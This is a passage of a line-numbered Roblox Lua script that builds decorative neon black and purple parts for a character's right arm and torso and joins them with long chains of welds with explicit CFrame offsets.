  1859. p18.CFrame = CFrame.new(68.6320877, 8.89929676, -14.2675419, 1.000319, 7.09295273e-006, -1.29642399e-006, -1.53779984e-005, 0.999966145, 2.53321537e-006, -2.20864695e-006, 2.76013293e-006, 1.00027096)
  1860. p18.CanCollide = false
  1861. p18.Locked = true
  1862. p18.BottomSurface = Enum.SurfaceType.Smooth
  1863. p18.TopSurface = Enum.SurfaceType.Smooth
  1864. b12 = Instance.new("SpecialMesh", p18)
  1865. b12.MeshType = Enum.MeshType.Sphere
  1866. b12.Name = "Mesh"
  1867. p19 = Instance.new("Part", m)
  1868. p19.BrickColor = BrickColor.new("Really black")
  1869. p19.Material = Enum.Material.Neon
  1870. p19.FormFactor = Enum.FormFactor.Custom
  1871. p19.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  1872. p19.CFrame = CFrame.new(68.6320801, 7.49934578, -14.2675457, 1.00032365, 7.02587113e-006, -1.41567671e-006, -1.53780693e-005, 0.999965429, 2.48852461e-006, -2.20865695e-006, 2.76013111e-006, 1.00027466)
  1873. p19.CanCollide = false
  1874. p19.Locked = true
  1875. p19.BottomSurface = Enum.SurfaceType.Smooth
  1876. p19.TopSurface = Enum.SurfaceType.Smooth
  1877. b13 = Instance.new("SpecialMesh", p19)
  1878. b13.MeshType = Enum.MeshType.Sphere
  1879. b13.Name = "Mesh"
  1880. w1 = Instance.new("Weld", p1)
  1881. w1.Name = "Wedge_Weld"
  1882. w1.Part0 = p1
  1883. w1.C0 = CFrame.new(-13.7623348, 36.7341995, 62.0193214, 9.89621753e-008, 1.14119814e-007, -1.0000037, -0.422620028, -0.90630722, -1.14673988e-007, -0.906311929, 0.422617972, 5.9372038e-008)
  1884. w1.Part1 = p2
  1885. w1.C1 = CFrame.new(-12.5623264, 36.7342033, 62.0193214, 9.89621753e-008, 1.14119814e-007, -1.0000037, -0.422620028, -0.90630722, -1.14673988e-007, -0.906311929, 0.422617972, 5.93720344e-008)
  1886. w2 = Instance.new("Weld", p2)
  1887. w2.Name = "Wedge_Weld"
  1888. w2.Part0 = p2
  1889. w2.C0 = CFrame.new(-12.5623264, 36.7342033, 62.0193214, 9.89621753e-008, 1.14119814e-007, -1.0000037, -0.422620028, -0.90630722, -1.14673988e-007, -0.906311929, 0.422617972, 5.93720344e-008)
  1890. w2.Part1 = p3
  1891. w2.C1 = CFrame.new(-13.1623297, 36.7342033, 62.0193214, 9.89621753e-008, 1.14119814e-007, -1.0000037, -0.422620028, -0.90630722, -1.14673988e-007, -0.906311929, 0.422617972, 5.93720415e-008)
  1892. w3 = Instance.new("Weld", p3)
  1893. w3.Name = "Wedge_Weld"
  1894. w3.Part0 = p3
  1895. w3.C0 = CFrame.new(-13.1623297, 36.7342033, 62.0193214, 9.89621753e-008, 1.14119814e-007, -1.0000037, -0.422620028, -0.90630722, -1.14673988e-007, -0.906311929, 0.422617972, 5.93720415e-008)
  1896. w3.Part1 = p4
  1897. w3.C1 = CFrame.new(13.7623348, -55.015049, 45.9640198, -9.79639907e-008, 4.26051052e-008, 1.0000037, 0.707110107, 0.707106173, -2.40756872e-008, -0.707109869, 0.707106531, -1.51036286e-008)
  1898. w4 = Instance.new("Weld", p4)
  1899. w4.Name = "Wedge_Weld"
  1900. w4.Part0 = p4
  1901. w4.C0 = CFrame.new(13.7623348, -55.015049, 45.9640198, -9.79639907e-008, 4.26051052e-008, 1.0000037, 0.707110107, 0.707106173, -2.40756872e-008, -0.707109869, 0.707106531, -1.51036286e-008)
  1902. w4.Part1 = p5
  1903. w4.C1 = CFrame.new(13.1623316, -55.0150452, 45.964016, -9.79639907e-008, 4.26051088e-008, 1.0000037, 0.707110107, 0.707106173, -2.40756837e-008, -0.707109869, 0.707106531, -1.51036286e-008)
  1904. w5 = Instance.new("Weld", p5)
  1905. w5.Name = "Wedge_Weld"
  1906. w5.Part0 = p5
  1907. w5.C0 = CFrame.new(13.1623316, -55.0150452, 45.964016, -9.79639907e-008, 4.26051088e-008, 1.0000037, 0.707110107, 0.707106173, -2.40756837e-008, -0.707109869, 0.707106531, -1.51036286e-008)
  1908. w5.Part1 = p6
  1909. w5.C1 = CFrame.new(12.5623283, -55.0150337, 45.9640045, -9.79639836e-008, 4.2605091e-008, 1.0000037, 0.707110107, 0.707106173, -2.40756819e-008, -0.707109869, 0.707106531, -1.51036659e-008)
  1910. w6 = Instance.new("Weld", p6)
  1911. w6.Name = "Part_Weld"
  1912. w6.Part0 = p6
  1913. w6.C0 = CFrame.new(12.5623283, -55.0150337, 45.9640045, -9.79639836e-008, 4.2605091e-008, 1.0000037, 0.707110107, 0.707106173, -2.40756819e-008, -0.707109869, 0.707106531, -1.51036659e-008)
  1914. w6.Part1 = p7
  1915. w6.C1 = CFrame.new(-70.3026047, -4.700037, 14.2622862, 1, -1.41560378e-007, 4.47034942e-008, 1.41560378e-007, 1, -7.45055218e-008, -4.47034836e-008, 7.45055289e-008, 1)
  1916. w7 = Instance.new("Weld", p7)
  1917. w7.Name = "Part_Weld"
  1918. w7.Part0 = p7
  1919. w7.C0 = CFrame.new(-70.3026047, -4.700037, 14.2622862, 1, -1.41560378e-007, 4.47034942e-008, 1.41560378e-007, 1, -7.45055218e-008, -4.47034836e-008, 7.45055289e-008, 1)
  1920. w7.Part1 = p8
  1921. w7.C1 = CFrame.new(-60.9718094, 24.5524559, 28.8434105, 0.881098926, 0.40146178, 0.250000894, -0.429376036, 0.900638521, 0.0669875294, -0.198267892, -0.166365504, 0.965929449)
  1922. w8 = Instance.new("Weld", p8)
  1923. w8.Name = "Part_Weld"
  1924. w8.Part0 = p8
  1925. w8.C0 = CFrame.new(-60.9718094, 24.5524559, 28.8434105, 0.881098926, 0.40146178, 0.250000894, -0.429376036, 0.900638521, 0.0669875294, -0.198267892, -0.166365504, 0.965929449)
  1926. w8.Part1 = p9
  1927. w8.C1 = CFrame.new(-70.2029343, -6.60003233, 14.2623386, 1.00000465, -1.78813934e-007, 0, 1.41561031e-007, 0.999999523, 4.47034836e-008, -4.47034836e-008, 7.4505806e-008, 1.0000037)
  1928. w9 = Instance.new("Weld", p9)
  1929. w9.Name = "Part_Weld"
  1930. w9.Part0 = p9
  1931. w9.C0 = CFrame.new(-70.2029343, -6.60003233, 14.2623386, 1.00000465, -1.78813934e-007, 0, 1.41561031e-007, 0.999999523, 4.47034836e-008, -4.47034836e-008, 7.4505806e-008, 1.0000037)
  1932. w9.Part1 = p10
  1933. w9.C1 = CFrame.new(-69.8029404, -7.60003138, 14.2623386, 1.00000465, -1.78813934e-007, 0, 1.41561031e-007, 0.999999523, 4.47034836e-008, -4.47034836e-008, 7.4505806e-008, 1.0000037)
  1934. w10 = Instance.new("Weld", p10)
  1935. w10.Name = "Part_Weld"
  1936. w10.Part0 = p10
  1937. w10.C0 = CFrame.new(-69.8029404, -7.60003138, 14.2623386, 1.00000465, -1.78813934e-007, 0, 1.41561031e-007, 0.999999523, 4.47034836e-008, -4.47034836e-008, 7.4505806e-008, 1.0000037)
  1938. w10.Part1 = p11
  1939. w10.C1 = CFrame.new(-48.2122765, 46.7597122, 23.9593029, 0.690653324, 0.678602815, 0.250001013, -0.711519539, 0.699469149, 0.0669875666, -0.129410163, -0.224143714, 0.965929449)
  1940. w11 = Instance.new("Weld", p11)
  1941. w11.Name = "Part_Weld"
  1942. w11.Part0 = p11
  1943. w11.C0 = CFrame.new(-48.2122765, 46.7597122, 23.9593029, 0.690653324, 0.678602815, 0.250001013, -0.711519539, 0.699469149, 0.0669875666, -0.129410163, -0.224143714, 0.965929449)
  1944. w11.Part1 = p12
  1945. w11.C1 = CFrame.new(-15.1098747, 68.1893845, 13.9264202, 0.176517636, 0.952019334, 0.250000954, -0.984043717, 0.164862752, 0.0669875368, 0.0225575883, -0.257833987, 0.965929389)
  1946. w12 = Instance.new("Weld", p12)
  1947. w12.Name = "Part_Weld"
  1948. w12.Part0 = p12
  1949. w12.C0 = CFrame.new(-15.1098747, 68.1893845, 13.9264202, 0.176517636, 0.952019334, 0.250000954, -0.984043717, 0.164862752, 0.0669875368, 0.0225575883, -0.257833987, 0.965929389)
  1950. w12.Part1 = p13
  1951. w12.C1 = CFrame.new(-69.3658066, -8.20003605, 13.2074509, 1.00000453, -2.98023224e-007, -3.72529421e-008, 1.49011612e-007, 0.999999285, -1.49011443e-008, -6.70552396e-008, 2.9802333e-008, 1.0000037)
  1952. w13 = Instance.new("Weld", p13)
  1953. w13.Name = "Part_Weld"
  1954. w13.Part0 = p13
  1955. w13.C0 = CFrame.new(-69.3658066, -8.20003605, 13.2074509, 1.00000453, -2.98023224e-007, -3.72529421e-008, 1.49011612e-007, 0.999999285, -1.49011443e-008, -6.70552396e-008, 2.9802333e-008, 1.0000037)
  1956. w13.Part1 = p14
  1957. w13.C1 = CFrame.new(-69.4029617, -6.2000351, 13.1623278, 1.00000453, -2.38418579e-007, -3.72529456e-008, 8.94069672e-008, 0.999999344, -1.49011452e-008, -6.70552396e-008, 2.9802333e-008, 1.0000037)
  1958. w14 = Instance.new("Weld", p14)
  1959. w14.Name = "Part_Weld"
  1960. w14.Part0 = p14
  1961. w14.C0 = CFrame.new(-69.4029617, -6.2000351, 13.1623278, 1.00000453, -2.38418579e-007, -3.72529456e-008, 8.94069672e-008, 0.999999344, -1.49011452e-008, -6.70552396e-008, 2.9802333e-008, 1.0000037)
  1962. w14.Part1 = p15
  1963. w14.C1 = CFrame.new(-69.1029282, -5.90003109, 14.2623358, 1.00000453, -2.98023224e-007, 2.98023188e-008, 1.1920929e-007, 0.999999583, 5.96046412e-008, -4.47034836e-008, 5.96046448e-008, 1.0000037)
  1964. w15 = Instance.new("Weld", p15)
  1965. w15.Name = "Part_Weld"
  1966. w15.Part0 = p15
  1967. w15.C0 = CFrame.new(-69.1029282, -5.90003109, 14.2623358, 1.00000453, -2.98023224e-007, 2.98023188e-008, 1.1920929e-007, 0.999999583, 5.96046412e-008, -4.47034836e-008, 5.96046448e-008, 1.0000037)
  1968. w15.Part1 = p16
  1969. w15.C1 = CFrame.new(-59.7121582, 24.7350845, 28.4943123, 0.881098986, 0.401461899, 0.250000954, -0.429376066, 0.90063864, 0.0669875517, -0.198267847, -0.166365474, 0.965929389)
  1970. w16 = Instance.new("Weld", p16)
  1971. w16.Name = "Part_Weld"
  1972. w16.Part0 = p16
  1973. w16.C0 = CFrame.new(-59.7121582, 24.7350845, 28.4943123, 0.881098986, 0.401461899, 0.250000954, -0.429376066, 0.90063864, 0.0669875517, -0.198267847, -0.166365474, 0.965929389)
  1974. w16.Part1 = p17
  1975. w16.C1 = CFrame.new(44.6532936, 52.7416191, 14.2623348, -0.707109928, 0.707106709, 2.10734257e-008, -0.707110047, -0.707106292, -6.32202699e-008, -4.47034836e-008, 5.96046448e-008, 1.0000037)
  1976. w17 = Instance.new("Weld", p17)
  1977. w17.Name = "Part_Weld"
  1978. w17.Part0 = p17
  1979. w17.C0 = CFrame.new(44.6532936, 52.7416191, 14.2623348, -0.707109928, 0.707106709, 2.10734257e-008, -0.707110047, -0.707106292, -6.32202699e-008, -4.47034836e-008, 5.96046448e-008, 1.0000037)
  1980. w17.Part1 = p18
  1981. w17.C1 = CFrame.new(-68.6029282, -6.90003586, 14.2623405, 1.00000465, -2.30967999e-007, -4.47034836e-008, 1.63912773e-007, 0.999999285, -2.98023224e-008, -7.4505806e-008, -1.49011612e-008, 1.0000037)
  1982. w18 = Instance.new("Weld", p18)
  1983. w18.Name = "Part_Weld"
  1984. w18.Part0 = p18
  1985. w18.C0 = CFrame.new(-68.6029282, -6.90003586, 14.2623405, 1.00000465, -2.30967999e-007, -4.47034836e-008, 1.63912773e-007, 0.999999285, -2.98023224e-008, -7.4505806e-008, -1.49011612e-008, 1.0000037)
  1986. w18.Part1 = p19
  1987. w18.C1 = CFrame.new(-68.6026077, -5.50004053, 14.2622881, 1, -1.63912006e-007, 7.4505806e-008, 1.63912006e-007, 1, 1.49011186e-008, -7.4505806e-008, -1.49011061e-008, 1)
  1988. w19 = Instance.new("Weld", p19)
  1989. w19.Name = "Wedge_Weld"
  1990. w19.Part0 = p19
  1991. w19.C0 = CFrame.new(-68.6026077, -5.50004053, 14.2622881, 1, -1.63912006e-007, 7.4505806e-008, 1.63912006e-007, 1, 1.49011186e-008, -7.4505806e-008, -1.49011061e-008, 1)
  1992. m.Parent = rarm
  1993. m:MakeJoints()
  1994. ----------------------------------------------------
  1995. local cor4 = Instance.new("Part", rarm.RightArm)
  1996. cor4.Name = "Thingy"
  1997. cor4.Locked = true
  1998. cor4.BottomSurface = 0
  1999. cor4.CanCollide = false
  2000. cor4.Size = Vector3.new(2, 1, 1)
  2001. cor4.Transparency = 1
  2002. cor4.TopSurface = 0
  2003. corw2 = Instance.new("Weld", cor4)
  2004. corw2.Part0 = rarm
  2005. corw2.Part1 = cor4
  2006. corw2.C0 = CFrame.new(0, 0, 0) * CFrame.Angles(math.rad(0), math.rad(0), math.rad(0))
  2007. corw2.C1 = CFrame.new(0, 0, 0)
  2008. weld2 = Instance.new("Weld", rarm.RightArm)
  2009. weld2.Part0 = cor4
  2010. weld2.Part1 = p14
  2011. weld2.C0 = CFrame.new(0, 0, 0)
  2012. ----------------------------------------------------
  2013. local m = Instance.new("Model")
  2014. m.Name = "Torso"
  2015. p1 = Instance.new("Part", m)
  2016. p1.BrickColor = BrickColor.new("Really black")
  2017. p1.Material = Enum.Material.Neon
  2018. p1.FormFactor = Enum.FormFactor.Custom
  2019. p1.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  2020. p1.CFrame = CFrame.new(67.3119202, 9.5997963, -14.263937, 1.00006402, 1.86259939e-007, 2.23464554e-008, -1.44914884e-006, 0.999991, -1.49014099e-008, -1.51248571e-006, 5.96053269e-008, 1.00005186)
  2021. p1.CanCollide = false
  2022. p1.Locked = true
  2023. p1.BottomSurface = Enum.SurfaceType.Smooth
  2024. p1.TopSurface = Enum.SurfaceType.Smooth
  2025. b1 = Instance.new("SpecialMesh", p1)
  2026. b1.MeshType = Enum.MeshType.Sphere
  2027. b1.Name = "Mesh"
  2028. p2 = Instance.new("Part", m)
  2029. p2.BrickColor = BrickColor.new("Really black")
  2030. p2.Material = Enum.Material.Neon
  2031. p2.FormFactor = Enum.FormFactor.Custom
  2032. p2.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  2033. p2.CFrame = CFrame.new(65.0111618, 9.59981537, -14.2638226, 1.00005496, 2.75671482e-007, 1.2665987e-007, -1.35973096e-006, 0.999992192, -2.98023224e-008, -1.40815973e-006, 4.47034836e-008, 1.00004447)
  2034. p2.CanCollide = false
  2035. p2.Locked = true
  2036. p2.BottomSurface = Enum.SurfaceType.Smooth
  2037. p2.TopSurface = Enum.SurfaceType.Smooth
  2038. b2 = Instance.new("SpecialMesh", p2)
  2039. b2.MeshType = Enum.MeshType.Sphere
  2040. b2.Name = "Mesh"
  2041. p3 = Instance.new("Part", m)
  2042. p3.BrickColor = BrickColor.new("Royal purple")
  2043. p3.Material = Enum.Material.Neon
  2044. p3.FormFactor = Enum.FormFactor.Custom
  2045. p3.Size = Vector3.new(0.200000048, 0.799999833, 0.200000048)
  2046. p3.CFrame = CFrame.new(67.6028595, 9.39744663, -14.2168236, 0.491504252, -0.868347466, -0.0669902489, 0.834227681, 0.491479307, -0.249998316, 0.250008702, 0.0669909269, 0.965961695)
  2047. p3.CanCollide = false
  2048. p3.Locked = true
  2049. p3.BottomSurface = Enum.SurfaceType.Smooth
  2050. p3.TopSurface = Enum.SurfaceType.Smooth
  2051. p4 = Instance.new("Part", m)
  2052. p4.BrickColor = BrickColor.new("Royal purple")
  2053. p4.Material = Enum.Material.Neon
  2054. p4.FormFactor = Enum.FormFactor.Custom
  2055. p4.Size = Vector3.new(0.200000048, 1.19999981, 0.200000048)
  2056. p4.CFrame = CFrame.new(64.6849442, 9.10655022, -14.2635975, 0.866056859, 0.500018656, 3.35280106e-007, -0.49999845, 0.866020203, -2.98035943e-008, -1.06866298e-006, -5.48167122e-007, 1.00002968)
  2057. p4.CanCollide = false
  2058. p4.Locked = true
  2059. p4.BottomSurface = Enum.SurfaceType.Smooth
  2060. p4.TopSurface = Enum.SurfaceType.Smooth
  2061. p5 = Instance.new("Part", m)
  2062. p5.BrickColor = BrickColor.new("Royal purple")
  2063. p5.Material = Enum.Material.Neon
  2064. p5.FormFactor = Enum.FormFactor.Custom
  2065. p5.Size = Vector3.new(0.200000048, 1.29999983, 0.200000048)
  2066. p5.CFrame = CFrame.new(66.9344177, 8.96636868, -14.2634897, -0.866048932, -0.500014246, 4.3958832e-007, 0.499999046, -0.866021395, -4.47044108e-008, 9.70867745e-007, 5.08911796e-007, 1.00002229)
  2067. p5.CanCollide = false
  2068. p5.Locked = true
  2069. p5.BottomSurface = Enum.SurfaceType.Smooth
  2070. p5.TopSurface = Enum.SurfaceType.Smooth
  2071. p6 = Instance.new("Part", m)
  2072. p6.BrickColor = BrickColor.new("Royal purple")
  2073. p6.Material = Enum.Material.Neon
  2074. p6.FormFactor = Enum.FormFactor.Custom
  2075. p6.Size = Vector3.new(0.200000048, 1.29999983, 0.200000048)
  2076. p6.CFrame = CFrame.new(65.358757, 9.04366112, -14.2633762, -0.866041601, 0.500008702, 5.43894771e-007, -0.499997824, -0.8660236, -5.96051208e-008, 8.43271948e-007, -5.21275751e-007, 1.0000149)
  2077. p6.CanCollide = false
  2078. p6.Locked = true
  2079. p6.BottomSurface = Enum.SurfaceType.Smooth
  2080. p6.TopSurface = Enum.SurfaceType.Smooth
  2081. p7 = Instance.new("Part", m)
  2082. p7.BrickColor = BrickColor.new("Really black")
  2083. p7.Material = Enum.Material.Neon
  2084. p7.FormFactor = Enum.FormFactor.Custom
  2085. p7.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  2086. p7.CFrame = CFrame.new(68.0082169, 9.19989014, -14.2632694, 1.00001383, 6.37024641e-007, 5.36441803e-007, -9.46223736e-007, 0.999997973, -1.04308121e-007, -8.7916851e-007, 5.96046519e-008, 1.00001121)
  2087. p7.CanCollide = false
  2088. p7.Locked = true
  2089. p7.BottomSurface = Enum.SurfaceType.Smooth
  2090. p7.TopSurface = Enum.SurfaceType.Smooth
  2091. b3 = Instance.new("SpecialMesh", p7)
  2092. b3.MeshType = Enum.MeshType.Sphere
  2093. b3.Name = "Mesh"
  2094. p8 = Instance.new("Part", m)
  2095. p8.BrickColor = BrickColor.new("Really black")
  2096. p8.Material = Enum.Material.Neon
  2097. p8.FormFactor = Enum.FormFactor.Custom
  2098. p8.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  2099. p8.CFrame = CFrame.new(64.4081497, 8.59989357, -14.2632627, 1.00001383, 5.32715489e-007, 5.6624458e-007, -8.4191629e-007, 0.999997973, -2.980277e-008, -9.08971174e-007, -1.4901623e-008, 1.00001121)
  2100. p8.CanCollide = false
  2101. p8.Locked = true
  2102. p8.BottomSurface = Enum.SurfaceType.Smooth
  2103. p8.TopSurface = Enum.SurfaceType.Smooth
  2104. b4 = Instance.new("SpecialMesh", p8)
  2105. b4.MeshType = Enum.MeshType.Sphere
  2106. b4.Name = "Mesh"
  2107. p9 = Instance.new("Part", m)
  2108. p9.BrickColor = BrickColor.new("Really black")
  2109. p9.Material = Enum.Material.Neon
  2110. p9.FormFactor = Enum.FormFactor.Custom
  2111. p9.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  2112. p9.CFrame = CFrame.new(67.8082123, 8.49989128, -14.2632694, 1.00001383, 6.37024641e-007, 5.36441803e-007, -9.46223736e-007, 0.999997973, -1.04308128e-007, -8.7916851e-007, 5.96046448e-008, 1.00001121)
  2113. p9.CanCollide = false
  2114. p9.Locked = true
  2115. p9.BottomSurface = Enum.SurfaceType.Smooth
  2116. p9.TopSurface = Enum.SurfaceType.Smooth
  2117. b5 = Instance.new("SpecialMesh", p9)
  2118. b5.MeshType = Enum.MeshType.Sphere
  2119. b5.Name = "Mesh"
  2120. p10 = Instance.new("Part", m)
  2121. p10.BrickColor = BrickColor.new("Royal purple")
  2122. p10.Material = Enum.Material.Neon
  2123. p10.FormFactor = Enum.FormFactor.Custom
  2124. p10.Size = Vector3.new(0.200000048, 0.999999821, 0.200000048)
  2125. p10.CFrame = CFrame.new(67.3000946, 8.34052181, -14.1962805, -0.323144197, -0.934642911, 0.148454338, 0.912730813, -0.349243045, -0.212012067, 0.250002205, 0.0669885725, 0.965932906)
  2126. p10.CanCollide = false
  2127. p10.Locked = true
  2128. p10.BottomSurface = Enum.SurfaceType.Smooth
  2129. p10.TopSurface = Enum.SurfaceType.Smooth
  2130. p11 = Instance.new("Part", m)
  2131. p11.BrickColor = BrickColor.new("Really black")
  2132. p11.Material = Enum.Material.Metal
  2133. p11.Name = "Main"
  2134. p11.FormFactor = Enum.FormFactor.Custom
  2135. p11.Size = Vector3.new(4.4000001, 4.19999981, 2.20000005)
  2136. p11.CFrame = CFrame.new(66.1075974, 8.19991207, -13.1631384, 1, 7.67355459e-007, 7.5990539e-007, -7.67355459e-007, 1, -2.98022478e-008, -7.5990539e-007, 2.98016651e-008, 1)
  2137. p11.CanCollide = false
  2138. p11.Locked = true
  2139. p11.BottomSurface = Enum.SurfaceType.Smooth
  2140. p11.TopSurface = Enum.SurfaceType.Smooth
  2141. p12 = Instance.new("Part", m)
  2142. p12.BrickColor = BrickColor.new("Really black")
  2143. p12.Material = Enum.Material.Neon
  2144. p12.FormFactor = Enum.FormFactor.Custom
  2145. p12.Size = Vector3.new(3, 3, 2)
  2146. p12.CFrame = CFrame.new(66.1075974, 8.19991302, -13.5631437, 1.00000453, 6.48145658e-007, 6.55599706e-007, -7.97160624e-007, 0.999999344, -1.49012251e-008, -7.5990863e-007, 2.98017362e-008, 1.0000037)
  2147. p12.CanCollide = false
  2148. p12.Locked = true
  2149. p12.BottomSurface = Enum.SurfaceType.Smooth
  2150. p12.TopSurface = Enum.SurfaceType.Smooth
  2151. b6 = Instance.new("SpecialMesh", p12)
  2152. b6.MeshType = Enum.MeshType.Sphere
  2153. b6.Name = "Mesh"
  2154. p13 = Instance.new("Part", m)
  2155. p13.BrickColor = BrickColor.new("Royal purple")
  2156. p13.Material = Enum.Material.Neon
  2157. p13.FormFactor = Enum.FormFactor.Custom
  2158. p13.Size = Vector3.new(0.200000048, 3.79999971, 0.200000048)
  2159. p13.CFrame = CFrame.new(66.1331863, 7.82621098, -12.0632286, 6.04434092e-007, -1.00000906, 6.55602378e-007, 0.999998689, 8.72662156e-007, -1.49012802e-008, 4.47028583e-008, 8.64220965e-007, 1.00000739)
  2160. p13.CanCollide = false
  2161. p13.Locked = true
  2162. p13.BottomSurface = Enum.SurfaceType.Smooth
  2163. p13.TopSurface = Enum.SurfaceType.Smooth
  2164. p14 = Instance.new("Part", m)
  2165. p14.BrickColor = BrickColor.new("Royal purple")
  2166. p14.Material = Enum.Material.Neon
  2167. p14.FormFactor = Enum.FormFactor.Custom
  2168. p14.Size = Vector3.new(0.200000048, 3.99999976, 0.200000048)
  2169. p14.CFrame = CFrame.new(65.0837555, 8.11279583, -12.0633221, 0.866040885, 0.500009477, 5.5129766e-007, -0.499999583, 0.866022587, -2.09610107e-013, -8.68580742e-007, -4.3265041e-007, 1.00001478)
  2170. p14.CanCollide = false
  2171. p14.Locked = true
  2172. p14.BottomSurface = Enum.SurfaceType.Smooth
  2173. p14.TopSurface = Enum.SurfaceType.Smooth
  2174. p15 = Instance.new("Part", m)
  2175. p15.BrickColor = BrickColor.new("Royal purple")
  2176. p15.Material = Enum.Material.Neon
  2177. p15.FormFactor = Enum.FormFactor.Custom
  2178. p15.Size = Vector3.new(0.200000048, 3.99999976, 0.200000048)
  2179. p15.CFrame = CFrame.new(67.0844116, 8.11277008, -12.0634222, 0.866049111, -0.500013351, 4.46991237e-007, 0.49999693, 0.866022587, 1.49009658e-008, -8.91868751e-007, 6.00952262e-007, 1.00002217)
  2180. p15.CanCollide = false
  2181. p15.Locked = true
  2182. p15.BottomSurface = Enum.SurfaceType.Smooth
  2183. p15.TopSurface = Enum.SurfaceType.Smooth
  2184. p16 = Instance.new("Part", m)
  2185. p16.BrickColor = BrickColor.new("Royal purple")
  2186. p16.Material = Enum.Material.Neon
  2187. p16.FormFactor = Enum.FormFactor.Custom
  2188. p16.Size = Vector3.new(0.200000048, 1.19999969, 0.200000048)
  2189. p16.CFrame = CFrame.new(65.484314, 7.30655766, -14.2634888, 0.906336308, 0.422632158, 3.49386681e-007, -0.422617853, 0.906302929, 2.46360354e-008, -1.01209048e-006, -3.84037776e-007, 1.00002587)
  2190. p16.CanCollide = false
  2191. p16.Locked = true
  2192. p16.BottomSurface = Enum.SurfaceType.Smooth
  2193. p16.TopSurface = Enum.SurfaceType.Smooth
  2194. p17 = Instance.new("Part", m)
  2195. p17.BrickColor = BrickColor.new("Royal purple")
  2196. p17.Material = Enum.Material.Neon
  2197. p17.FormFactor = Enum.FormFactor.Custom
  2198. p17.Size = Vector3.new(0.200000048, 1.89999986, 0.200000048)
  2199. p17.CFrame = CFrame.new(67.1100159, 7.10342312, -14.2635927, 0.866056919, -0.50001812, 3.65035532e-007, 0.499996245, 0.866021872, 5.96044032e-008, -8.79435504e-007, 6.97014912e-007, 1.00002956)
  2200. p17.CanCollide = false
  2201. p17.Locked = true
  2202. p17.BottomSurface = Enum.SurfaceType.Smooth
  2203. p17.TopSurface = Enum.SurfaceType.Smooth
  2204. p18 = Instance.new("Part", m)
  2205. p18.BrickColor = BrickColor.new("Royal purple")
  2206. p18.Material = Enum.Material.Neon
  2207. p18.FormFactor = Enum.FormFactor.Custom
  2208. p18.Size = Vector3.new(0.200000048, 1.19999981, 0.200000048)
  2209. p18.CFrame = CFrame.new(65.6104889, 7.05342484, -14.2637053, -0.707138717, -0.707138956, 3.36865924e-007, 0.707104087, -0.707101464, 1.4901164e-007, 9.95719802e-007, 5.95316749e-007, 1.00003707)
  2210. p18.CanCollide = false
  2211. p18.Locked = true
  2212. p18.BottomSurface = Enum.SurfaceType.Smooth
  2213. p18.TopSurface = Enum.SurfaceType.Smooth
  2214. p19 = Instance.new("Part", m)
  2215. p19.BrickColor = BrickColor.new("Really black")
  2216. p19.Material = Enum.Material.Neon
  2217. p19.FormFactor = Enum.FormFactor.Custom
  2218. p19.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  2219. p19.CFrame = CFrame.new(65.2110596, 6.69982004, -14.2638168, 1.00005388, -1.78813906e-007, 3.08695888e-007, -1.7285347e-006, 0.999993682, 2.38419489e-007, -1.15321473e-006, 3.72538381e-007, 1.0000447)
  2220. p19.CanCollide = false
  2221. p19.Locked = true
  2222. p19.BottomSurface = Enum.SurfaceType.Smooth
  2223. p19.TopSurface = Enum.SurfaceType.Smooth
  2224. b7 = Instance.new("SpecialMesh", p19)
  2225. b7.MeshType = Enum.MeshType.Sphere
  2226. b7.Name = "Mesh"
  2227. p20 = Instance.new("Part", m)
  2228. p20.BrickColor = BrickColor.new("Really black")
  2229. p20.Material = Enum.Material.Neon
  2230. p20.FormFactor = Enum.FormFactor.Custom
  2231. p20.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  2232. p20.CFrame = CFrame.new(66.7116928, 6.49980783, -14.2639294, 1.00006235, -2.98028993e-007, 2.80525398e-007, -1.8477574e-006, 0.999992907, 3.27827962e-007, -1.18139712e-006, 4.61949412e-007, 1.00005233)
  2233. p20.CanCollide = false
  2234. p20.Locked = true
  2235. p20.BottomSurface = Enum.SurfaceType.Smooth
  2236. p20.TopSurface = Enum.SurfaceType.Smooth
  2237. b8 = Instance.new("SpecialMesh", p20)
  2238. b8.MeshType = Enum.MeshType.Sphere
  2239. b8.Name = "Mesh"
  2240. p21 = Instance.new("Part", m)
  2241. p21.BrickColor = BrickColor.new("Royal purple")
  2242. p21.Material = Enum.Material.Neon
  2243. p21.FormFactor = Enum.FormFactor.Custom
  2244. p21.Size = Vector3.new(0.200000048, 0.799999893, 0.200000048)
  2245. p21.CFrame = CFrame.new(67.0623169, 6.40337944, -14.264039, 0.258836836, -0.965994418, 2.52354425e-007, 0.965917706, 0.258818805, 4.17237061e-007, 2.19511691e-007, 1.31106742e-006, 1.00005996)
  2246. p21.CanCollide = false
  2247. p21.Locked = true
  2248. p21.BottomSurface = Enum.SurfaceType.Smooth
  2249. p21.TopSurface = Enum.SurfaceType.Smooth
  2250. p22 = Instance.new("Part", m)
  2251. p22.BrickColor = BrickColor.new("Really black")
  2252. p22.Material = Enum.Material.Neon
  2253. p22.FormFactor = Enum.FormFactor.Custom
  2254. p22.Size = Vector3.new(0.400000006, 0.400000006, 0.400000006)
  2255. p22.CFrame = CFrame.new(67.5129166, 6.29977846, -14.2641516, 1.00007939, -5.96046448e-007, 2.24182997e-007, -2.14576721e-006, 0.999991298, 5.06646757e-007, -1.23776351e-006, 6.40773351e-007, 1.00006759)
  2256. p22.CanCollide = false
  2257. p22.Locked = true
  2258. p22.BottomSurface = Enum.SurfaceType.Smooth
  2259. p22.TopSurface = Enum.SurfaceType.Smooth
  2260. b9 = Instance.new("SpecialMesh", p22)
  2261. b9.MeshType = Enum.MeshType.Sphere
  2262. b9.Name = "Mesh"
  2263. w1 = Instance.new("Weld", p1)
  2264. w1.Name = "Part_Weld"
  2265. w1.Part0 = p1
  2266. w1.C0 = CFrame.new(-67.3029404, -7.60003757, 14.2623367, 1.00000453, -2.08616257e-007, -3.72529385e-008, 1.1920929e-007, 0.999999404, -1.49011452e-008, -6.70552325e-008, 2.9802333e-008, 1.0000037)
  2267. w1.Part1 = p2
